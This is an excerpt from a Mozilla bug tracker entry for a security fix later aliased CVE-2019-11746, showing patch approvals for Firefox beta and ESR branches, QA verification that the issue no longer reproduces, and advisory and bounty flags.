:smaug, could you have a look please?
For more information, please visit auto_nag documentation.

Flags: needinfo?(bugs)
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla70

Comment on attachment 9077506 [details]
Bug 1564449, ensure the right body element is used throughout the method call, r=mccr8

Landed on mozilla-central and has sec-approval+, uplift approved for this week 69 beta 12.

Attachment #9077506 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Group: dom-core-security → core-security-release

Comment on attachment 9077506 [details]
Bug 1564449, ensure the right body element is used throughout the method call, r=mccr8

sec fix, approved for 68.1 and 60.9

Attachment #9077506 - Flags: approval-mozilla-esr68?
Attachment #9077506 - Flags: approval-mozilla-esr68+
Attachment #9077506 - Flags: approval-mozilla-esr60+
Flags: qe-verify+
QA Whiteboard: [qa-triaged]

Hi, I managed to reproduce this issue in an older version of Nightly, but this issue no longer occurs on ESR 60.9, 68.1, Beta 69.0b12 or our latest Nightly build. I will mark this issue accordingly.

Status: RESOLVED → VERIFIED
QA Whiteboard: [qa-triaged]
Flags: qe-verify+
Whiteboard: [checkin on 8/6/2019]
Alias: CVE-2019-11746
Whiteboard: [adv-main69+][adv-esr68.1+][adv-esr60.9+]
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release